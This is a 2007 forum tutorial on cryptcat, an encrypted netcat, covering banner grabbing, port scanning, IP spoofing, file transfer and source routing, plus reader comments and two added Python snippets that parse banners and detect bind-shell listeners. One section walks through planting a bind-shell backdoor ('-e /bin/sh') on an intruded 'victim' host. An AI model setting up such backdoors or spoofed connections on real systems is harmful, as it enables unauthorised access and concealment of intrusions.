Cryptcat: Advanced Usage

Advanced Usage of the encrypt3d SwiSS army K.nife!



+=+=+=+=+=+=+=+=+=
Cryptcat: Advanced Usage
+=+=+=+=+=+=+=+=+=

++||||||> CRYPTCAT <|||||||||++

It is, basically, netcat with encryption (Twofish) turned ON. So instead of having communications sent/received in clear text, you have them encrypted with Twofish... so they don't get sniffed!

This tool is often referred to as the "TCP/IP Swiss Army Knife", because of its ability to establish various connections across networks.

So, if you've ever used netcat, then it should be easy for you to use cryptcat. The command-line syntax is the same.

Let's start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:
______________________________________________________________

First, to establish a connection between two machines, we'd go about this by:

-= making machine #1 (local/victim) listen on a port (with an IP of 192.168.1.1) =-

>$ cryptcat -l -p 3333

-= Making machine #2 (remote/attacker) establish connection (from 192.168.1.2) =-

>$ cryptcat 192.168.1.1 3333
______________________________________________________________

You can also use cryptcat for banner grabbing, e.g. for SMTP servers:

>$ cryptcat 192.168.1.1 25
220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun
19 Feb 2007 12:25:02 -0500 (EST)

This should connect you to the SMTP server, and output the server's name and version.

______________________________________________________________

You can also use cryptcat as a script to banner grab, say on an HTTP server, as such:

>$ cryptcat hostname 80 < get_reqst.txt

Set get_reqst.txt to contain the following:

HEAD / HTTP/1.0[ENTER]
[ENTER]

(don't actually type in [ENTER], rather, just press it twice) duh!

OR --- try (from the SHELL):

>$ echo -e "GET / HTTP/1.0\r\n\r\n" | cryptcat -w 5 192.168.1.1 80
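A grabbed banner is only useful once the product and version are pulled out of it, e.g. to compare what a host advertises against your patch inventory. The following Python is an added example, not code from the article or the cryptcat project: it parses a constructed SMTP 220 greeting modelled on the one above and a constructed HTTP response to the HEAD request in get_reqst.txt (the Server header value is made up).

```python
import re

# Constructed sample banners modelled on the article's output (not captured
# from a real host); the HTTP Server header value is made up.
SMTP_BANNER = ("220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; "
               "Sun, 19 Feb 2007 12:25:02 -0500 (EST)")
HTTP_HEAD_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Date: Mon, 19 Feb 2007 17:25:02 GMT\r\n"
    "Server: Apache/1.3.37 (Unix)\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# 220 <host> [ESMTP|SMTP] <software> [<version>] ...
SMTP_RE = re.compile(
    r"^220[ -](?P<host>\S+)\s+(?:E?SMTP\s+)?"
    r"(?P<software>[A-Za-z][\w.-]*)(?:\s+(?P<version>[^\s;]+))?"
)

def parse_smtp_banner(line):
    """Return {host, software, version} from an SMTP 220 greeting,
    or None if the line is not a 220 greeting."""
    m = SMTP_RE.match(line.strip())
    return m.groupdict() if m else None

def parse_http_head(response):
    """Return the status line plus product/version from the Server header
    of an HTTP response to a HEAD request; missing header -> None values."""
    head = response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for h in lines[1:]:
        name, sep, value = h.partition(":")
        if sep:  # skip malformed header lines
            headers[name.strip().lower()] = value.strip()
    server = headers.get("server", "")
    product, _, rest = server.partition("/")
    version = rest.split()[0] if rest else None
    return {"status": lines[0], "product": product or None, "version": version}
```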

______________________________________________________________

Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you specify for the local machine to listen on with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:

>$ cryptcat -e /bin/sh -l -p 9999

(that's assuming the user is using UNIX)
Now, as the attacker, all you need to do is connect from your machine (or locally) to the victim, and that should spawn a shell for j00.

>$ cryptcat 192.168.1.1 9999
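From the defender's side, the listener above is easy to spot in a process listing: a netcat-family binary started with -l and -e/-c. The following Python is an added example, not code from the article or the cryptcat project; it runs that check over a constructed ps-style listing (the PIDs, users and commands are made up) and reports every netcat/cryptcat process that listens, flagging listen-plus-exec as a bind shell.

```python
import os
import shlex

NETCAT_NAMES = {"nc", "netcat", "ncat", "cryptcat", "nc.traditional", "nc.openbsd"}

# Constructed ps-style output (not from a real host); the first entry is the
# listener the article sets up with: cryptcat -e /bin/sh -l -p 9999
PS_OUTPUT = """\
PID   USER  COMMAND
1234  root  cryptcat -e /bin/sh -l -p 9999
2345  root  /usr/sbin/sshd -D
3456  bob   nc -lvp 4444 -e /bin/bash
4567  bob   cryptcat 192.168.1.1 9999
5678  root  /usr/bin/nc -l -p 8080
"""

def classify_command(cmdline):
    """Return (kind, reason) for a netcat-family command line, or None when
    the binary is not netcat/cryptcat. Combined short flags (-lvp) count."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) not in NETCAT_NAMES:
        return None
    flags = set()
    for tok in argv[1:]:
        if tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            flags.update(tok[1:])
    listens = "l" in flags
    execs = bool(flags & {"e", "c"})
    if listens and execs:
        return "bind_shell", "listening socket attached to a program (-l with -e/-c)"
    if listens:
        return "listener", "netcat-family process holding a listening socket"
    if execs:
        return "exec_client", "outbound connection attached to a program (-e/-c)"
    return "outbound", "plain client connection"

def find_netcat_listeners(ps_text):
    """Scan ps-style text (PID USER COMMAND) and return findings for every
    netcat-family process other than a plain outbound client."""
    findings = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        verdict = classify_command(cmd)
        if verdict and verdict[0] != "outbound":
            findings.append({"pid": int(pid), "user": user,
                             "kind": verdict[0], "reason": verdict[1]})
    return findings
```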

______________________________________________________________

You can even make cryptcat act like a PORT SCANNER with:

>$ cryptcat -v -z 192.168.1.1 1-9999

This scans 192.168.1.1 for ports 1 to 9999.

______________________________________________________________

Also, you can use it to sp00f your source IP Address:

>$ cryptcat -s 69.13.37.69 192.168.1.1

Remember, the sp00fed IP address (69.13.37.69) comes before the remote IP address (192.168.1.1). This causes the remote host to respond back to the sp00fed IP address. Don't start thinking of how malicious you can be with this!

______________________________________________________________

Ah, yes, and one of my favourites... Transferring Files. To do this, simply set a computer (not necessarily a victim) to host a file (take_me.txt):

>$ cryptcat -v -l -p 9999 < take_me.txt

Now, to get take_me.txt, all we do on the client is:

>$ cryptcat -v 192.168.1.1 9999 > take_me.txt

Note: 192.168.1.1 is still the server/victim.
______________________________________________________________

And finally, you can use it for source-routing to connect to a port on a remote host:

>$ cryptcat -g 69.13.37.69 192.168.1.1 9999

Note: 69.13.37.69 is the gateway we're going through to connect to 192.168.1.1 on port 9999.

LINKS
HOMEPAGE: http://farm9.org/Cryptcat/
Download: http://sourceforge.net/projects/cryptcat/
Man Page: http://www.phlak.org/docs/tools/cryptcat.txt

Hope you learned s0mething at least. Expect more! And ...

Always Remember!
1: Netfish is RIGHT.
2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.

Comments

only_samurai on February 19 2007 - 14:44:48
yet another badass article by the netfish.... let no one say he doesn't contribute. .... lol netfish.... enjoyed the article tho.... :ninja:
HardHackz on February 19 2007 - 15:23:15
o.0 A little confused, next time explain the O/S, that it's unix, etc. Good job though.
nights_shadow on February 19 2007 - 17:52:03
Interesting, never even heard of cryptcat, good read.
-The_Flash- on February 19 2007 - 19:45:37
Keep up the great articles dude. Awesome to read something worthwhile.
netfish on February 19 2007 - 23:35:21
@HardHackz ... no need to explain what OS it is for, it has ports to pretty much all the main ones, comprising Windows NT, BSD and Linux. The syntax remains the same on all those platforms too.
end3r on February 21 2007 - 03:36:52
good article, nice info.
sleazoid on February 21 2007 - 03:51:14
nice work man! :happy:
sirus69 on March 06 2007 - 08:15:05
waste of time